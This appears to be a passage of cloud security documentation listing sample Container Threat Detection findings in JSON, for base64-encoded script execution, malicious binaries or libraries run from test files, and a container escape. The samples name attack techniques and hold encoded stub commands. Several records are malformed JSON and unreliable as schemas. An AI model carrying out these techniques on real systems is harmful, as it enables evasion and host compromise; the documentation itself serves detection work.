{   "finding": {     "access": {},     "application": {},     "attackExposure": {},     "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",     "category": "Defense Evasion: Base64 Encoded Python Script Executed",     "cloudDlpDataProfile": {},     "cloudDlpInspection": {},     "containers": [       {         "name": "CONTAINER_NAME",         "uri": "CONTAINER_IMAGE_URI",         "imageId": "CONTAINER_IMAGE_ID",         "createTime": "2024-06-17T18:50:13Z"       }     ],     "createTime": "2025-01-21T19:55:22.017Z",     "database": {},     "eventTime": "2025-01-21T19:55:21.762Z",     "exfiltration": {},     "findingClass": "THREAT",     "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",     "indicator": {},     "kernelRootkit": {},     "kubernetes": {       "pods": [         {           "name": "CONTAINER_NAME",           "ns": "NAMESPACE",           "containers": [             {               "name": "CONTAINER_NAME",               "uri": "CONTAINER_IMAGE_URI",               "imageId": "CONTAINER_IMAGE_ID",               "createTime": "2025-01-21T19:55:19Z"             }           ]         }       ],       "nodes": [         {           "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"         }       ]     },     "logEntries": [       {         "cloudLoggingEntry": {           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": "2025-01-21T19:55:19.654640277Z"         }       }     ],     "mitreAttack": {},     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "mitreAttack": {       "primaryTactic": "DEFENSE_EVASION",       "primaryTechniques": [         "OBFUSCATED_FILES_OR_INFO",       ],       "additionalTactics": [         "EXECUTION"       ],       "additionalTechniques": [         "DEOBFUSCATE_DECODE_FILES_OR_INFO"         "COMMAND_AND_SCRIPTING_INTERPRETER",         "UNIX_SHELL"       ]     },     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "muteUpdateTime": "1970-01-01T00:00:00Z",     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",     "parentDisplayName": "Container Threat Detection",     "processes": [       {         "binary": {           "path": "\"/usr/bin/base64\"",           "size": "39096",           "sha256": "a51595201def5bde3c47d68c8e8dda31f4e424293f2a5eefb00e47f2db0c2d84",           "hashedSize": "39096",           "partiallyHashed": false,           "diskPath": {}         },         "script": {           "size": "0",           "hashedSize": "0",           "partiallyHashed": false,           "diskPath": {}         },         "args": [           "\"base64\"",           "\"-d\"",           "\"cHl0aG9uIC1j\""         ],         "argumentsTruncated": false,         "envVariables": [           {             "name": "\"HOSTNAME\"",             "val": "\"CONTAINER_NAME\""           },         ],         "pid": "9",         "parentPid": "1"       }     ],     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "securityPosture": {},     "severity": "MEDIUM",     "state": "ACTIVE",     "vulnerability": {},     "externalSystems": {}   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "displayName": "CLUSTER_ID",     "type": "google.container.Cluster",     "cloudProvider": "GOOGLE_CLOUD_PLATFORM",     "service": "container.googleapis.com",     "location": "ZONE",     "gcpMetadata": {       "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "projectDisplayName": "PROJECT_ID",       "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "parentDisplayName": "PROJECT_ID",       "folders": [         {           "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",           "resourceFolderDisplayName": "FOLDER_ID"         }       ],       "organization": "organizations/ORGANIZATION_ID"     },     "resourcePath": {       "nodes": [         {           "nodeType": "GCP_PROJECT",           "id": "projects/PROJECT_ID",           "displayName": "PROJECT_ID"         },         {           "nodeType": "GCP_FOLDER",           "id": "folders/FOLDER_NUMBER",           "displayName": "FOLDER_ID"         },         {           "nodeType": "GCP_ORGANIZATION",           "id": "organizations/ORGANIZATION_ID"         }       ]     },     "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID"   },   "sourceProperties": {     "sourceId": {       "projectNumber": "PROJECT_NUMBER",       "customerOrganizationNumber": "ORGANIZATION_NUMBER"     },     "detectionCategory": {       "ruleName": "ktd_base64_encoded_python_script_executed"     },     "affectedResources": [       {         "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"       }     ],     "evidence": [       {         "sourceLogId": {           "projectId": "PROJECT_ID",           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": {             "seconds": "1729291973",             "nanos": 687426149           }         }       }     ],     "properties": {},     "findingId": "FINDING_ID",     "contextUris": {       "mitreUri": {         "displayName": "MITRE Link",         "url": "https://attack.mitre.org/tactics/TA0005/"       },       "virustotalIndicatorQueryUri": [         {           "displayName": "VirusTotal File Link",           "url": "https://www.virustotal.com/gui/file/a51595201def5bde3c47d68c8e8dda31f4e424293f2a5eefb00e47f2db0c2d84/detection"         }       ],       "relatedFindingUri": {}     }   }, }     

Defense Evasion: Base64 Encoded Shell Script Executed

{   "finding": {     "access": {},     "application": {},     "attackExposure": {},     "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",     "category": "Defense Evasion: Base64 Encoded Shell Script Executed",     "cloudDlpDataProfile": {},     "cloudDlpInspection": {},     "containers": [       {         "name": "CONTAINER_NAME",         "uri": "CONTAINER_IMAGE_URI",         "imageId": "CONTAINER_IMAGE_ID",         "createTime": "2024-06-17T18:50:13Z"       }     ],     "createTime": "2025-01-21T19:55:22.017Z",     "database": {},     "eventTime": "2025-01-21T19:55:21.762Z",     "exfiltration": {},     "findingClass": "THREAT",     "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",     "indicator": {},     "kernelRootkit": {},     "kubernetes": {       "pods": [         {           "name": "CONTAINER_NAME",           "ns": "NAMESPACE",           "containers": [             {               "name": "CONTAINER_NAME",               "uri": "CONTAINER_IMAGE_URI",               "imageId": "CONTAINER_IMAGE_ID",               "createTime": "2025-01-21T19:55:19Z"             }           ]         }       ],       "nodes": [         {           "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"         }       ]     },     "logEntries": [       {         "cloudLoggingEntry": {           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": "2025-01-21T19:55:19.654640277Z"         }       }     ],     "mitreAttack": {},     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "mitreAttack": {       "primaryTactic": "DEFENSE_EVASION",       "primaryTechniques": [         "DATA_ENCODING",         "STANDARD_ENCODING"       ],       "additionalTactics": [         "COMMAND_AND_CONTROL",         "EXECUTION"       ],       "additionalTechniques": [         "COMMAND_AND_SCRIPTING_INTERPRETER",         "UNIX_SHELL",         "OBFUSCATED_FILES_OR_INFO",         "DEOBFUSCATE_DECODE_FILES_OR_INFO"       ]     },     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "muteUpdateTime": "1970-01-01T00:00:00Z",     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",     "parentDisplayName": "Container Threat Detection",     "processes": [       {         "binary": {           "path": "\"/usr/bin/base64\"",           "size": "39096",           "sha256": "a51595201def5bde3c47d68c8e8dda31f4e424293f2a5eefb00e47f2db0c2d84",           "hashedSize": "39096",           "partiallyHashed": false,           "diskPath": {}         },         "script": {           "size": "0",           "hashedSize": "0",           "partiallyHashed": false,           "diskPath": {}         },         "args": [           "\"base64\"",           "\"-d\"",           "\"IyEvYmluL2Jhc2gK\""         ],         "argumentsTruncated": false,         "envVariables": [           {             "name": "\"HOSTNAME\"",             "val": "\"CONTAINER_NAME\""           },         ],         "pid": "9",         "parentPid": "1"       }     ],     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "securityPosture": {},     "severity": "MEDIUM",     "state": "ACTIVE",     "vulnerability": {},     "externalSystems": {}   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "displayName": "CLUSTER_ID",     "type": "google.container.Cluster",     "cloudProvider": "GOOGLE_CLOUD_PLATFORM",     "service": "container.googleapis.com",     "location": "ZONE",     "gcpMetadata": {       "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "projectDisplayName": "PROJECT_ID",       "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "parentDisplayName": "PROJECT_ID",       "folders": [         {           "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",           "resourceFolderDisplayName": "FOLDER_ID"         }       ],       "organization": "organizations/ORGANIZATION_ID"     },     "resourcePath": {       "nodes": [         {           "nodeType": "GCP_PROJECT",           "id": "projects/PROJECT_ID",           "displayName": "PROJECT_ID"         },         {           "nodeType": "GCP_FOLDER",           "id": "folders/FOLDER_NUMBER",           "displayName": "FOLDER_ID"         },         {           "nodeType": "GCP_ORGANIZATION",           "id": "organizations/ORGANIZATION_ID"         }       ]     },     "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID"   },   "sourceProperties": {     "sourceId": {       "projectNumber": "PROJECT_NUMBER",       "customerOrganizationNumber": "ORGANIZATION_NUMBER"     },     "detectionCategory": {       "ruleName": "ktd_base64_encoded_shell_script_executed"     },     "affectedResources": [       {         "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"       }     ],     "evidence": [       {         "sourceLogId": {           "projectId": "PROJECT_ID",           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": {             "seconds": "1729291973",             "nanos": 687426149           }         }       }     ],     "properties": {},     "findingId": "FINDING_ID",     "contextUris": {       "mitreUri": {         "displayName": "MITRE Link",         "url": "https://attack.mitre.org/tactics/TA0005/"       },       "virustotalIndicatorQueryUri": [         {           "displayName": "VirusTotal File Link",           "url": "https://www.virustotal.com/gui/file/a51595201def5bde3c47d68c8e8dda31f4e424293f2a5eefb00e47f2db0c2d84/detection"         }       ],       "relatedFindingUri": {}     }   }, }     

Execução: Added Malicious Binary Executed

{   "finding": {     "access": {},     "application": {},     "attackExposure": {},     "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"     "category": "Execution: Added Malicious Binary Executed",     "cloudDlpDataProfile": {},     "cloudDlpInspection": {},     "containers": [       {         "name": "CONTAINER_NAME",         "uri": "CONTAINER_URI",         "imageId": "CONTAINER_IMAGE_ID"       }     ],     "createTime": "2023-11-13T19:51:22.538Z",     "database": {},     "eventTime": "2023-11-13T19:51:22.383Z",     "exfiltration": {},     "findingClass": "THREAT",     "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",     "indicator": {},     "kernelRootkit": {},     "kubernetes": {       "pods": [         {           "name": "CONTAINER_NAME",           "ns": "default",           "containers": [                 {                   "name": "CONTAINER_NAME",                   "uri": "CONTAINER_URI",                   "imageId": CONTAINER_IMAGE_ID"                 }           ]         }       ],       "nodes": [         {           "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"         }       ]     },     "mitreAttack": {       "primaryTactic": "EXECUTION",       "primaryTechniques": [         "NATIVE_API"       ]     },     "mute": "UNDEFINED",     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",     "parentDisplayName": "Container Threat Detection",     "processes": [       {         "binary": {           "path": "\"/tmp/malicious-binary-dd922bc4ee3b49fd-should-trigger\"",           "size": "68",           "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",           "hashedSize": "68",           "partiallyHashed": false         },         "script": {           "size": "0",           "hashedSize": "0",           "partiallyHashed": false         },         "args": [           "\"/tmp/malicious-binary-dd922bc4ee3b49fd-should-trigger\""         ],         "argumentsTruncated": false,         "envVariables": [           {             "name": "\"KUBERNETES_SERVICE_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT\"",             "val": "\"tcp://10.68.2.129:443\""           },           {             "name": "\"HOSTNAME\"",             "val": "\"ktd-test-added-test-malicious-binary\""           },           {             "name": "\"HOME\"",             "val": "\"/root\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",             "val": "\"10.68.2.129\""           },           {             "name": "\"PATH\"",             "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",             "val": "\"tcp\""           },           {             "name": "\"DEBIAN_FRONTEND\"",             "val": "\"noninteractive\""           },           {             "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP\"",             "val": "\"tcp://10.68.2.129:443\""           },           {             "name": "\"KUBERNETES_SERVICE_HOST\"",             "val": "\"10.68.2.129\""           },           {             "name": "\"PWD\"",             "val": "\"/malicious_files\""           }         ],         "pid": "7",         "parentPid": "1"       }     ],     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",     "securityPosture": {},     "severity": "CRITICAL",     "state": "ACTIVE",     "vulnerability": {},     "externalSystems": {}   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",     "display_name": "CLUSTER_ID",     "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",     "project_display_name": "PROJECT_ID",     "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",     "parent_display_name": "PROJECT_ID",     "type": "google.container.Cluster",     "folders": []   },   "sourceProperties": {     "sourceId": {       "projectNumber": "PROJECT_NUMBER",       "customerOrganizationNumber": "ORGANIZATION_NUMBER"     },     "detectionCategory": {       "ruleName": "added_malicious_binary_executed"     },     "detectionPriority": "CRITICAL",     "affectedResources": [       {         "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"       }     ],     "evidence": [       {         "sourceLogId": {           "projectId": "PROJECT_ID",           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": {             "seconds": "1699905066",             "nanos": 618571329           }         }       }     ],     "properties": {},     "findingId": "FINDING_ID",     "contextUris": {       "mitreUri": {         "displayName": "MITRE Link",         "url": "https://attack.mitre.org/techniques/T1106/"       },       "virustotalIndicatorQueryUri": [         {           "displayName": "VirusTotal IP Link",           "url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"         }       ],       "cloudLoggingQueryUri": [         {           "displayName": "Cloud Logging Query Link",           "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T19:51:06.618571329Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"         }       ],       "relatedFindingUri": {}     }   } }   

Execução: Added Malicious Library Loaded

{   "finding": {     "access": {},     "application": {},     "attackExposure": {},     "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"     "category": "Execution: Added Malicious Library Loaded",     "cloudDlpDataProfile": {},     "cloudDlpInspection": {},     "containers": [       {         "name": "CONTAINER_NAME",         "uri": "CONTAINER_URI",         "imageId": "CONTAINER_IMAGE_ID"       }     ],     "createTime": "2023-11-13T21:40:14.340Z",     "database": {},     "eventTime": "2023-11-13T21:40:14.209Z",     "exfiltration": {},     "findingClass": "THREAT",     "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",     "indicator": {},     "kernelRootkit": {},     "kubernetes": {       "pods": [         {           "name": "CONTAINER_NAME",           "ns": "default",           "containers": [                 {                   "name": "CONTAINER_NAME",                   "uri": "CONTAINER_URI",                   "imageId": CONTAINER_IMAGE_ID"                 }           ]         }       ],       "nodes": [         {           "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"         }       ]     },     "mitreAttack": {       "primaryTactic": "EXECUTION",       "primaryTechniques": [         "SHARED_MODULES"       ]     },     "mute": "UNDEFINED",     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",     "parentDisplayName": "Container Threat Detection",     "processes": [       {         "binary": {           "path": "\"/malicious_files/drop_mal_lib\"",           "size": "5005064",           "sha256": "fe2e70de9f77047d3bf5debe3135811300c9c69b937b7fd3e2ca8451a942d5fb",           "hashedSize": "5005064",           "partiallyHashed": false         },         "libraries": [           {             "path": "\"/tmp/added-malicious-library-299fd066380ce690-should-trigger\"",             "size": "68",             "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",             "hashedSize": "68",             "partiallyHashed": false           }         ],         "script": {           "size": "0",           "hashedSize": "0",           "partiallyHashed": false         },         "args": [           "\"/malicious_files/drop_mal_lib\"",           "\"/tmp/added-malicious-library-299fd066380ce690-should-trigger\""         ],         "argumentsTruncated": false,         "envVariables": [           {             "name": "\"KUBERNETES_SERVICE_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT\"",             "val": "\"tcp://10.108.174.129:443\""           },           {             "name": "\"HOSTNAME\"",             "val": "\"ktd-test-added-malicious-library\""           },           {             "name": "\"HOME\"",             "val": "\"/root\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",             "val": "\"10.108.174.129\""           },           {             "name": "\"PATH\"",             "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",             "val": "\"tcp\""           },           {             "name": "\"DEBIAN_FRONTEND\"",             "val": "\"noninteractive\""           },           {             "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP\"",             "val": "\"tcp://10.108.174.129:443\""           },           {             "name": "\"KUBERNETES_SERVICE_HOST\"",             "val": "\"10.108.174.129\""           },           {             "name": "\"PWD\"",             "val": "\"/malicious_files\""           }         ],         "pid": "8",         "parentPid": "1"       }     ],     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",     "securityPosture": {},     "severity": "CRITICAL",     "state": "ACTIVE",     "vulnerability": {},     "externalSystems": {}   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",     "display_name": "CLUSTER_ID",     "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",     "project_display_name": "PROJECT_ID",     "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",     "parent_display_name": "PROJECT_ID",     "type": "google.container.Cluster",     "folders": []   },   "sourceProperties": {     "sourceId": {       "projectNumber": "PROJECT_NUMBER",       "customerOrganizationNumber": "ORGANIZATION_NUMBER"     },     "detectionCategory": {       "ruleName": "added_malicious_library_loaded"     },     "detectionPriority": "CRITICAL",     "affectedResources": [       {         "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"       }     ],     "evidence": [       {         "sourceLogId": {           "projectId": "PROJECT_ID",           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": {             "seconds": "1699911603",             "nanos": 535268047           }         }       }     ],     "properties": {},     "findingId": "FINDING_ID",     "contextUris": {       "mitreUri": {         "displayName": "MITRE Link",         "url": "https://attack.mitre.org/techniques/T1129/"       },       "virustotalIndicatorQueryUri": [         {           "displayName": "VirusTotal IP Link",           "url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"         }       ],       "cloudLoggingQueryUri": [         {           "displayName": "Cloud Logging Query Link",           "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:40:03.535268047Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"         }       ],       "relatedFindingUri": {}     }   } }   

Execução: binário malicioso incorporado executado

{   "finding": {     "access": {},     "application": {},     "attackExposure": {},     "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"     "category": "Execution: Built in Malicious Binary Executed",     "cloudDlpDataProfile": {},     "cloudDlpInspection": {},     "containers": [       {         "name": "CONTAINER_NAME",         "uri": "CONTAINER_URI",         "imageId": "CONTAINER_IMAGE_ID"       }     ],     "createTime": "2023-11-13T21:38:57.405Z",     "database": {},     "eventTime": "2023-11-13T21:38:57.250Z",     "exfiltration": {},     "findingClass": "THREAT",     "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",     "indicator": {},     "kernelRootkit": {},     "kubernetes": {       "pods": [         {           "name": "CONTAINER_NAME",           "ns": "default",           "containers": [                 {                   "name": "CONTAINER_NAME",                   "uri": "CONTAINER_URI",                   "imageId": CONTAINER_IMAGE_ID"                 }           ]         }       ],       "nodes": [         {           "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"         }       ]     },     "mitreAttack": {       "primaryTactic": "EXECUTION",       "primaryTechniques": [         "NATIVE_API"       ]     },     "mute": "UNDEFINED",     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",     "parentDisplayName": "Container Threat Detection",     "processes": [       {         "binary": {           "path": "\"/malicious_files/eicar_testing_file\"",           "size": "68",           "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",           "hashedSize": "68",           "partiallyHashed": false         },         "script": {           "size": "0",           "hashedSize": "0",           "partiallyHashed": false         },         "args": [           "\"/malicious_files/eicar_testing_file\"",           "\"built-in-malicious-binary-818358caa95b6d42\""         ],         "argumentsTruncated": false,         "envVariables": [           {             "name": "\"KUBERNETES_SERVICE_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT\"",             "val": "\"tcp://10.77.124.129:443\""           },           {             "name": "\"HOSTNAME\"",             "val": "\"ktd-test-built-in-malicious-binary\""           },           {             "name": "\"HOME\"",             "val": "\"/root\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",             "val": "\"10.77.124.129\""           },           {             "name": "\"PATH\"",             "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",             "val": "\"tcp\""           },           {             "name": "\"DEBIAN_FRONTEND\"",             "val": "\"noninteractive\""           },           {             "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP\"",             "val": "\"tcp://10.77.124.129:443\""           },           {             "name": "\"KUBERNETES_SERVICE_HOST\"",             "val": "\"10.77.124.129\""           },           {             "name": "\"PWD\"",             "val": "\"/malicious_files\""           }         ],         "pid": "7",         "parentPid": "1"       }     ],     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",     "securityPosture": {},     "severity": "CRITICAL",     "state": "ACTIVE",     "vulnerability": {},     "externalSystems": {}   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",     "display_name": "CLUSTER_ID",     "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",     "project_display_name": "PROJECT_ID",     "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",     "parent_display_name": "PROJECT_ID",     "type": "google.container.Cluster",     "folders": []   },   "sourceProperties": {     "sourceId": {       "projectNumber": "PROJECT_NUMBER",       "customerOrganizationNumber": "ORGANIZATION_NUMBER"     },     "detectionCategory": {       "ruleName": "built_in_malicious_binary_executed"     },     "detectionPriority": "CRITICAL",     "affectedResources": [       {         "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"       }     ],     "evidence": [       {         "sourceLogId": {           "projectId": "PROJECT_ID",           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": {             "seconds": "1699911519",             "nanos": 603253608           }         }       }     ],     "properties": {},     "findingId": "FINDING_ID",     "contextUris": {       "mitreUri": {         "displayName": "MITRE Link",         "url": "https://attack.mitre.org/techniques/T1106/"       },       "virustotalIndicatorQueryUri": [         {           "displayName": "VirusTotal IP Link",           "url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"         }       ],       "cloudLoggingQueryUri": [         {           "displayName": "Cloud Logging Query Link",           "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:38:39.603253608Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"         }       ],       "relatedFindingUri": {}     }   } }   

Execução: fuga do contentor

{   "finding": {     "access": {},     "application": {},     "attackExposure": {},     "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",     "category": "Execution: Container Escape",     "cloudDlpDataProfile": {},     "cloudDlpInspection": {},     "containers": [       {         "name": "CONTAINER_NAME",         "uri": "CONTAINER_IMAGE_URI",         "imageId": "CONTAINER_IMAGE_ID",         "createTime": "2024-06-17T18:50:13Z"       }     ],     "createTime": "2024-10-21T19:08:35.255Z",     "database": {},     "eventTime": "2024-10-21T19:08:35.091Z",     "exfiltration": {},     "findingClass": "THREAT",     "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",     "indicator": {},     "kernelRootkit": {},     "kubernetes": {       "pods": [         {           "name": "CONTAINER_NAME",           "ns": "NAMESPACE",           "containers": [             {               "name": "CONTAINER_NAME",               "uri": "CONTAINER_IMAGE_URI",               "imageId": "CONTAINER_IMAGE_ID",               "createTime": "2024-06-17T18:50:13Z"             }           ]         }       ],       "nodes": [         {           "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"         }       ]     },     "logEntries": [       {         "cloudLoggingEntry": {           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": "2024-10-21T19:07:41.503072537Z"         }       }     ],     "mitreAttack": {       "primaryTactic": "EXECUTION",       "primaryTechniques": [         "USER_EXECUTION"       ],       "additionalTactics": [         "PRIVILEGE_ESCALATION"       ],       "additionalTechniques": [         "ESCAPE_TO_HOST"       ]     },     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "muteUpdateTime": "1970-01-01T00:00:00Z",     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",     "parentDisplayName": "Container Threat Detection",     "processes": [       {         "binary": {           "path": "INTERPRETER",           "size": "147176",           "sha256": "INTERPRETER_SHA_256",           "hashedSize": "147176",           "partiallyHashed": false,           "diskPath": {}         },         "script": {           "size": "0",           "hashedSize": "0",           "partiallyHashed": false,           "diskPath": {}         },         "args": [           "INTERPRETER",           "ARG"         ],         "argumentsTruncated": false,         "envVariables": [           {             "name": "\"KUBERNETES_SERVICE_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"HOSTNAME\"",             "val": "\"ktd-test-container-escape-suspicious-tool-ba379a7c2168db11\""           },           {             "name": "\"HOME\"",             "val": "\"/root\""           },           {             "name": "\"GPG_KEY\"",             "val": "\"7169605F62C751356D054A26A821E680E5FA6305\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",             "val": "\"34.118.224.1\""           },           {             "name": "\"PATH\"",             "val": "\"/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",             "val": "\"tcp\""           },           {             "name": "\"LANG\"",             "val": "\"C.UTF-8\""           },           {             "name": "\"PYTHON_VERSION\"",             "val": "\"3.12.6\""           },           {             "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"KUBERNETES_SERVICE_HOST\"",             "val": "\"34.118.224.1\""           },           {             "name": "\"PWD\"",             "val": "\"/\""           }         ],         "pid": "9",         "parentPid": "1"       }     ],     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "securityPosture": {},     "severity": "CRITICAL",     "state": "ACTIVE",     "vulnerability": {},     "externalSystems": {}   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "displayName": "CLUSTER_ID",     "type": 